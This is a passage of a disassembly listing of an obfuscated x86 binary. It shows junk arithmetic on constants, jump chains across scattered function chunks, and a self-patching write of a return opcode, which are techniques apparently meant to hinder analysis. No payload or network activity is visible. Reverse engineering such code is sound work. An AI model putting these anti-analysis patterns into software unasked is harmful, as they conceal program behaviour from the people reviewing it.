		jno	loc_4421FC

loc_4491BE:				; CODE XREF: sub_440CEA:loc_457AF0j
		popf

loc_4491BF:				; CODE XREF: sub_441DCC:loc_43D9F1j
		rol	edx, 1Ch
		add	edx, 40444631h
		jmp	loc_43FF44
; END OF FUNCTION CHUNK	FOR sub_441DCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_4491CD:				; CODE XREF: sub_449372:loc_45A696j
		xchg	ecx, [esp-14h+arg_C]
		jmp	loc_45BD77
; END OF FUNCTION CHUNK	FOR sub_449372
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_4491D6:				; CODE XREF: sub_449372-2A55j
		jmp	loc_444FCD
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------

loc_4491DB:				; CODE XREF: k2vbe3.d:0043E01Bj
		jz	loc_446C81
; START	OF FUNCTION CHUNK FOR sub_453DB9

loc_4491E1:				; CODE XREF: sub_453DB9+6j
		jmp	loc_459C3E
; END OF FUNCTION CHUNK	FOR sub_453DB9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_4491E6:				; CODE XREF: sub_448D7F+Aj
		jmp	loc_4442FF
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44032C

loc_4491EB:				; CODE XREF: sub_44032C+Aj
		jmp	loc_456E7F
; END OF FUNCTION CHUNK	FOR sub_44032C
; ---------------------------------------------------------------------------
		add	edx, 5D83DCA2h
		mov	[esi], ecx
		sub	esi, ebx
		jmp	loc_446C80
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD9D

loc_4491FF:				; CODE XREF: sub_44AD9D:loc_44ADA8j
		xor	eax, 0A76726D8h
		rol	eax, 18h
		xor	eax, 11D9EA48h
		add	eax, ebp
		push	ecx
		push	62F2BCADh
		pop	ecx
		jmp	loc_4400FF
; END OF FUNCTION CHUNK	FOR sub_44AD9D

; =============== S U B	R O U T	I N E =======================================



sub_44921C	proc near		; CODE XREF: sub_44921C-7381p
					; k2vbe3.d:00448272j

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043CBB6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D94E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043D9BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FD46 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004415B8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441E96 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00442755 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044284B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442915 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443AB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445FDB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004479BC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044878C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00448C77 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448EE3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044927B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C5EF SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044CD9B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E81C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E858 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045076A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451945 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451A72 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451D03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045279C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00453197 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004535A9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004543F4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045516F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004551F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004567F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004579E3 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045820C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045880B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A5F2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B290 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	edx, [ebp-28h]
		call	sub_456666

loc_449228:				; CODE XREF: sub_455B26-9B35j
		jmp	loc_45076A
sub_44921C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44922D:				; CODE XREF: sub_43CCD0-21Ej
		and	ebx, edi
		adc	eax, ebx
		xor	ecx, 6906A627h

loc_449237:				; CODE XREF: sub_43CCD0:loc_4465C3j
		push	0D7CD827Ah
		pop	eax
		sub	eax, 6CC97740h
		jmp	loc_447B05
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_449248:				; CODE XREF: sub_45B20A:loc_444D99j
		shl	ebx, 0Ah
		add	edi, 930122FFh
		and	edx, esi
		test	edx, eax
		jmp	loc_453784
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------

loc_44925A:				; CODE XREF: k2vbe3.d:0044E894j
		add	eax, 7E5B03Bh
		add	eax, ebp
		add	eax, 18023F9Dh
		push	esi
		jmp	loc_45A4B7
; ---------------------------------------------------------------------------
		dw 8A0Fh
; ---------------------------------------------------------------------------
		enter	0FFFFFFE1h, 0FFh
		sub	esi, edi
		jmp	loc_44D1EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_44927B:				; CODE XREF: sub_44921C:loc_43D9BAj
		jnz	loc_4479BC
		adc	esi, 0DA393EAAh
		cmp	eax, edx
		jmp	loc_45279C
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
		jg	loc_43FCA5
		jmp	loc_44B334
; ---------------------------------------------------------------------------
		cmp	esi, 0CB2F72DAh
		jmp	loc_4481D6
; ---------------------------------------------------------------------------

loc_4492A4:				; CODE XREF: k2vbe3.d:loc_452A48j
		jz	loc_456B09
		jmp	loc_43EC9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_4492AF:				; CODE XREF: sub_43DA1E:loc_454A3Ej
					; k2vbe3.d:00454A5Cj
		xor	edi, 0D75E565Ah
		and	edi, 978CEDB3h
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_4492BB:				; CODE XREF: sub_44DB59:loc_453FA9j
		xor	edi, 810888B0h
		call	sub_443FC1
; END OF FUNCTION CHUNK	FOR sub_44DB59
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4492C6:				; CODE XREF: sub_450F71-12823j
		jmp	nullsub_108
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4492CB:				; CODE XREF: sub_447E07+12A99j
		jnz	loc_4486F2
		jmp	loc_452AEE
; END OF FUNCTION CHUNK	FOR sub_447E07
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_517. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4492D7:				; CODE XREF: k2vbe3.d:0044F1E8j
		jmp	loc_4435DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4492DC:				; CODE XREF: sub_44B94B-5341j
		jz	loc_45B23B

loc_4492E2:				; CODE XREF: sub_444144:loc_44606Cj
		jmp	loc_44F4EE
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		or	ebx, eax
		jmp	sub_447D8B
; ---------------------------------------------------------------------------

loc_4492EE:				; DATA XREF: sub_451087:loc_451091o
		xchg	ebp, [esp]
		mov	ebx, edx
		xchg	ebx, [esp]
		push	esi
		push	45EEB1B4h
		jmp	loc_447BDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_449301:				; CODE XREF: sub_449372-A149j
		and	eax, 0C5362AAh
		test	eax, 2000h
		jmp	loc_451F18
; END OF FUNCTION CHUNK	FOR sub_449372

; =============== S U B	R O U T	I N E =======================================



sub_449312	proc near		; DATA XREF: k2vbe3.d:0045863Ao

; FUNCTION CHUNK AT 0043C513 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F238 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F9E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447805 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045719C SIZE 00000011 BYTES

		pop	ebx
		mov	eax, [eax]
		or	eax, eax
		jz	loc_451CE5
		jmp	loc_43F9E9
sub_449312	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	edx, 8CB242DAh
		call	sub_45B20A

loc_44932C:				; CODE XREF: k2vbe3.d:0044A5BEj
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		call	sub_456AC2
; START	OF FUNCTION CHUNK FOR sub_444966

loc_449337:				; CODE XREF: sub_444966+D88Aj
		jmp	loc_4560E4
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_44933C:				; CODE XREF: sub_443F0D+8D4j
		jmp	loc_453C34
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BDE4

loc_449341:				; CODE XREF: sub_45BDE4:loc_44167Bj
					; k2vbe3.d:00449568j
		pop	ebp
		call	sub_4423D2
; END OF FUNCTION CHUNK	FOR sub_45BDE4
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_449347:				; CODE XREF: sub_447E07-35F6j
		jmp	loc_4402A6
; END OF FUNCTION CHUNK	FOR sub_447E07

; =============== S U B	R O U T	I N E =======================================



sub_44934C	proc near		; DATA XREF: sub_44A28D+4o
		push	9B70854h
		pop	edi
		or	edi, 0CC60CB22h
		add	edi, 324DC385h
		xchg	edi, [esp+0]
		jmp	sub_453347
sub_44934C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_449366:				; CODE XREF: sub_44CA34:loc_441946j
					; sub_44F42B:loc_456A82j
		push	eax
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_44F42B
; ---------------------------------------------------------------------------

loc_44936D:				; CODE XREF: k2vbe3.d:00447B33j
		jmp	loc_457460

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_449372	proc near		; CODE XREF: sub_457D4B-130EBp
					; k2vbe3.d:0045680Ep

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_C		= dword	ptr  14h

; FUNCTION CHUNK AT 0043C109 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E238 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E730 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043EBD2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F097 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F21A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043F788 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044039B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441D49 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044214E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004430E9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443860 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444C88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444FCD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004466A4 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044690D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446B92 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447FE4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00448BA2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448BE7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004491CD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004491D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449301 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B259 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044B510 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044B6BF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044C26C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C7DD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F7E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F829 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004500B0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450736 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450E8E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451F18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453C79 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00454C1F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045566E SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00456089 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004564D1 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045902A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045923D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A314 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A696 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BD77 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_447FE4
sub_449372	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44937A:				; CODE XREF: k2vbe3.d:00446B9Fj
		cmp	esi, 6FF10F04h
		jmp	loc_440676
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_449385:				; CODE XREF: sub_44945C:loc_4441ACj
		jz	loc_44A9BB
		xchg	edx, [edi]
		jmp	loc_442F16
; END OF FUNCTION CHUNK	FOR sub_44945C

; =============== S U B	R O U T	I N E =======================================



sub_449392	proc near		; CODE XREF: k2vbe3.d:00442A4Bp
					; k2vbe3.d:0044D2BFj
		xchg	esi, [esp+0]
sub_449392	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_449395:				; CODE XREF: sub_454AD4:loc_4430A9j
		pop	esi
		xchg	esi, [esp-4+arg_0]
		mov	edx, esi
		pop	esi
		jmp	loc_44ABCC
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_4493A1:				; CODE XREF: sub_43D45F+134EDj
		xor	ecx, 0A99B8C5Dh
		popf
		add	eax, ecx
		pop	ecx
		jmp	loc_4405D9
; END OF FUNCTION CHUNK	FOR sub_43D45F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458019

loc_4493B0:				; CODE XREF: sub_458019:loc_444C7Ej
		or	ebp, 0C3A5CD33h
		mov	ecx, eax
		jmp	loc_442CD5
; END OF FUNCTION CHUNK	FOR sub_458019
; ---------------------------------------------------------------------------
		mov	[ebx], edx

loc_4493BF:				; CODE XREF: k2vbe3.d:0045893Bj
		shr	ecx, 14h
		jmp	sub_43E360
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_4493C7:				; CODE XREF: sub_43EEC6:loc_44C814j
		jz	loc_43F6FF
		jmp	loc_44A924
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_4493D2:				; CODE XREF: sub_445124+72A9j
		jz	loc_450D2E

loc_4493D8:				; CODE XREF: k2vbe3.d:0044E754j
		jmp	loc_44E7E0
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
		and	edi, ecx
		jmp	loc_450D26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B667

loc_4493E4:				; CODE XREF: sub_44B667:loc_444CA7j
		xor	eax, 0DE672C44h
		add	eax, ebp
		add	eax, 9EC78C41h
		mov	eax, [eax]
		jmp	loc_4466D3
; END OF FUNCTION CHUNK	FOR sub_44B667
; ---------------------------------------------------------------------------

loc_4493F9:				; CODE XREF: k2vbe3.d:0044D306j
		mov	[edx], eax
		xor	edx, ebp
		jnz	loc_442D2B
		xchg	eax, ebp

loc_449405:				; CODE XREF: k2vbe3.d:loc_440095j
		push	esi
		jmp	loc_447988
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_44940B:				; CODE XREF: sub_4597AE:loc_45735Aj
		push	edx
		push	eax
		mov	eax, [ebp-8]

loc_449410:				; CODE XREF: sub_44B94B+3EBAj
		push	offset loc_44745C
		jmp	loc_440ABB
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------

loc_44941A:				; CODE XREF: k2vbe3.d:loc_4515A4j
		xchg	ecx, [esp]
		call	sub_44F49C
		push	2AB505FCh
		pop	eax
		rol	eax, 8
		xor	eax, 6EA16F41h
		jmp	loc_45A029
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BCF0

loc_449436:				; CODE XREF: sub_45BCF0:loc_44563Bj
		push	eax

loc_449437:				; CODE XREF: sub_453F59+Aj
		push	0D225799Eh
		pop	eax
		add	eax, 0FEBC967Ch
		or	eax, 58C131F8h
		add	eax, 7EA214D3h
		add	eax, ebp
		add	eax, 0A87AB917h
		jmp	loc_44C893
; END OF FUNCTION CHUNK	FOR sub_45BCF0

; =============== S U B	R O U T	I N E =======================================



sub_44945C	proc near		; CODE XREF: k2vbe3.d:004529CDj
					; sub_44469A+10CCDp

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CAF5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CB2B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043D672 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FE68 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00442F16 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004441AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448153 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448808 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449385 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044DE8E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004516B6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045318A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004586A9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B398 SIZE 00000007 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_43C7A4
		jmp	loc_45318A
sub_44945C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_44946E:				; CODE XREF: k2vbe3.d:loc_456049j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BEA

loc_44946F:				; CODE XREF: sub_444BEA+Ej
		jmp	loc_440C49
; END OF FUNCTION CHUNK	FOR sub_444BEA
; ---------------------------------------------------------------------------
		mov	ds:off_41E044, eax
; START	OF FUNCTION CHUNK FOR sub_447266

loc_44947A:				; CODE XREF: sub_447266:loc_451343j
		lea	eax, sub_4545C4
		mov	byte ptr [eax],	0C3h
		jmp	loc_4490DC
; END OF FUNCTION CHUNK	FOR sub_447266

; =============== S U B	R O U T	I N E =======================================



sub_449488	proc near		; CODE XREF: sub_402129+110p
					; k2vbe3.d:00447724j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043ED9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447716 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044772F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044FBA3 SIZE 00000005 BYTES

		push	eax
		push	0C58AF9D0h
		pop	eax
		rol	eax, 16h
		jmp	loc_44FBA3
sub_449488	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C49B

loc_449497:				; CODE XREF: sub_44C49B-F85Bj
		mov	eax, [esp-4+arg_0]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		call	sub_442D04
		mov	eax, 0F34E90C0h
		jmp	loc_442F86
; END OF FUNCTION CHUNK	FOR sub_44C49B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_4494AF:				; CODE XREF: sub_44A1B1-5D58j
		mov	eax, [ebp+8]
		mov	eax, [eax-18h]
		and	eax, 7
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_45131D
		push	offset loc_45130C
		jmp	loc_455444
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------

loc_4494CF:				; DATA XREF: sub_43D45F+12A7Eo
		xchg	ebx, [esp]

loc_4494D2:				; CODE XREF: k2vbe3.d:loc_43E1D0j
		mov	eax, edx
		push	offset byte_44421A
		jmp	loc_456049
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_4494DE:				; CODE XREF: sub_454E69:loc_451790j
		pop	edi
		rol	edi, 1Dh
		test	edi, 400h
		jmp	loc_450EAC
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
		and	eax, edx
		xchg	ecx, [eax]
		jmp	sub_44DEC3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_4494F6:				; CODE XREF: sub_43E470:loc_455CC9j
		add	eax, 35486BBFh
		or	eax, 823C7568h
		rol	eax, 1
		test	eax, 20h
		jmp	loc_43CE43
; END OF FUNCTION CHUNK	FOR sub_43E470
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481DC

loc_44950F:				; CODE XREF: sub_4481DC-4A57j
		pop	ebp

locret_449510:				; CODE XREF: sub_4481DC:loc_44F22Dj
		retn
; END OF FUNCTION CHUNK	FOR sub_4481DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_449511:				; CODE XREF: sub_43F364+FD55j
		jmp	loc_458CC7
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481DC

loc_449516:				; CODE XREF: sub_4481DC-4A65j
					; sub_4481DC+13j
		mov	eax, [ebp-4]
		push	offset loc_455F21
		jmp	nullsub_247
; END OF FUNCTION CHUNK	FOR sub_4481DC
; ---------------------------------------------------------------------------
		xor	eax, 0C479950Ch
		rol	eax, 19h
		call	sub_44CCD8
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_449531:				; CODE XREF: sub_43C3A9+E5A8j
		jmp	loc_450479
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_449536:				; CODE XREF: k2vbe3.d:00457E37j
		and	eax, ds:4000F0h
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_44953C:				; CODE XREF: sub_44662B:loc_45B878j
		or	eax, 563A92B3h
		sub	eax, 0AD71C641h
		xor	eax, 68AC9841h
		jmp	loc_43F40E
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------

loc_449553:				; CODE XREF: k2vbe3.d:004541BCj
		or	esi, ebx
		or	ecx, 8011F24Dh
		adc	esi, ecx
; START	OF FUNCTION CHUNK FOR sub_44E503

loc_44955D:				; CODE XREF: sub_44E503:loc_4541ACj
		add	ebx, 0C145A942h
		jmp	loc_459492
; END OF FUNCTION CHUNK	FOR sub_44E503
; ---------------------------------------------------------------------------
		jbe	loc_449341
		jmp	loc_43F73A
; ---------------------------------------------------------------------------

loc_449573:				; CODE XREF: k2vbe3.d:loc_43FCD7j
		pop	eax
		mov	eax, [esp]
		push	edx
		push	ebx
		push	45EAB31Eh
		pop	ebx
		jmp	loc_456CEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_449584:				; CODE XREF: sub_44D9A7+8A88j
		jnz	loc_45306C
		popf
		add	esi, 77028811h
		and	esi, edi
		jmp	loc_45306C
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_449598:				; CODE XREF: sub_44A7C2:loc_449B86j
		or	eax, 4020B017h
		xor	eax, 5B5C1CA0h
		add	eax, ebp
		push	edi
		push	0B3C43E9Dh
		pop	edi
		jmp	loc_44D031
; END OF FUNCTION CHUNK	FOR sub_44A7C2
; ---------------------------------------------------------------------------
		rol	esi, 0Eh
		jmp	loc_44F209
; ---------------------------------------------------------------------------

loc_4495BA:				; CODE XREF: k2vbe3.d:loc_451859j
		mov	edx, eax
		xchg	edx, [esp]
		mov	edx, eax
		push	edi
		push	721AD230h
		pop	edi
		jmp	loc_44857E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_422. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_4495CE:				; CODE XREF: sub_457DCA-1821j
		jmp	loc_45AF03
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------

loc_4495D3:				; CODE XREF: k2vbe3.d:004563DAj
		jnz	loc_4419B8
		jb	loc_44170A

loc_4495DF:				; CODE XREF: k2vbe3.d:loc_4563BCj
		add	eax, 0CA8D288Dh
		push	edx
		push	2A1EE428h
		jmp	loc_43C27A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_4495F0:				; CODE XREF: sub_43DA1E+8930j
		test	esi, eax
		jmp	loc_4499F8
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_4495F7:				; CODE XREF: sub_453347:loc_44DD80j
		jnb	loc_43D55B
		sbb	edx, edi
		jle	loc_441E91
		jmp	loc_453ECC
; END OF FUNCTION CHUNK	FOR sub_453347
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_262. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_180. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456706

loc_44960C:				; CODE XREF: k2vbe3.d:00452AD9j
					; sub_456706+11j
		jmp	loc_45331A
; END OF FUNCTION CHUNK	FOR sub_456706
; ---------------------------------------------------------------------------

locret_449611:				; CODE XREF: k2vbe3.d:loc_4594D5j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441632

loc_449612:				; CODE XREF: sub_441632+1Ej
		jmp	loc_44CDEA
; END OF FUNCTION CHUNK	FOR sub_441632
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_449617:				; CODE XREF: sub_443CD9:loc_442DCAj
		xor	eax, eax

loc_449619:				; CODE XREF: sub_443CD9-6465j
		mov	[ebp-5], al
		mov	al, [ebp-5]
		pop	ecx
		call	sub_43D86B
; END OF FUNCTION CHUNK	FOR sub_443CD9
; START	OF FUNCTION CHUNK FOR sub_4541D3

loc_449625:				; CODE XREF: sub_456C15:loc_44E8D2j
					; sub_4541D3+819Bj
		jmp	loc_4476B5
; END OF FUNCTION CHUNK	FOR sub_4541D3
; ---------------------------------------------------------------------------

loc_44962A:				; CODE XREF: k2vbe3.d:00453FECj
		jmp	loc_44D628
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_44962F:				; CODE XREF: sub_443F0D-60A2j
		jmp	loc_44D0F5
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_449634:				; CODE XREF: sub_444D7B+DA74j
		jz	nullsub_36
		jmp	loc_43D583
; ---------------------------------------------------------------------------

loc_44963F:				; CODE XREF: sub_444D7B:loc_44DE18j
		push	5D5CC428h
		xchg	edi, [esp+0]
		mov	eax, edi
		pop	edi
		jmp	loc_444000
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_44964F:				; CODE XREF: sub_44C1BD-FEFAj
		shl	edx, 1Dh
		jmp	loc_4431B0
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_449657:				; CODE XREF: sub_44A79B:loc_459709j
